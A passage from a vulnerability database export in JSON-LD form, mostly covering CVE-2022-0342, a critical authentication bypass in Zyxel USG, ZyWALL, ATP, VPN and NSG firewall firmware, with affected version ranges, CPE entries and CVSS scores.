        "data": "plural \u00a0ZyXEL\u00a0 Cross-site scripting vulnerability in the product",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009236"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1972"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202203-1898

    Vulnerability from variot - Updated: 2023-12-18 14:04

    An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device. USG40 firmware, USG40W firmware, USG60 firmware etc. ZyXEL The product contains authentication vulnerabilities.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202203-1898",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "zywall 110",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "zywall 1100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg60",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "zywall 310",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg flex 100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg60w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "zywall 1100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "usg60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg40",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "vpn300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "nsg300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "nsg300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.20"
          },
          {
            "model": "zywall 310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "usg40w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "nsg300",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "1.33"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "zywall 110",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "usg40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "vpn1000",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.20"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.20"
          },
          {
            "model": "vpn50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg40",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg 310",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg60w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "zywall 110",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg40w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg60",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "zywall 1100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-007481"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0342"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.71",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.71",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.71",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.71",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_110_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.71",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_110:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.71",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_1100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "4.71",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_1100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.20",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.21",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "1.33",
                        "versionStartIncluding": "1.20",
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:-:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      },
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:nsg300_firmware:1.33:p4:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:nsg300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0342"
          }
        ]
      },
      "cve": "CVE-2022-0342",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2022-0342",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.9,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-0342",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-0342",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2022-0342",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202203-2311",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-0342",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-0342"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-007481"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0342"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202203-2311"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
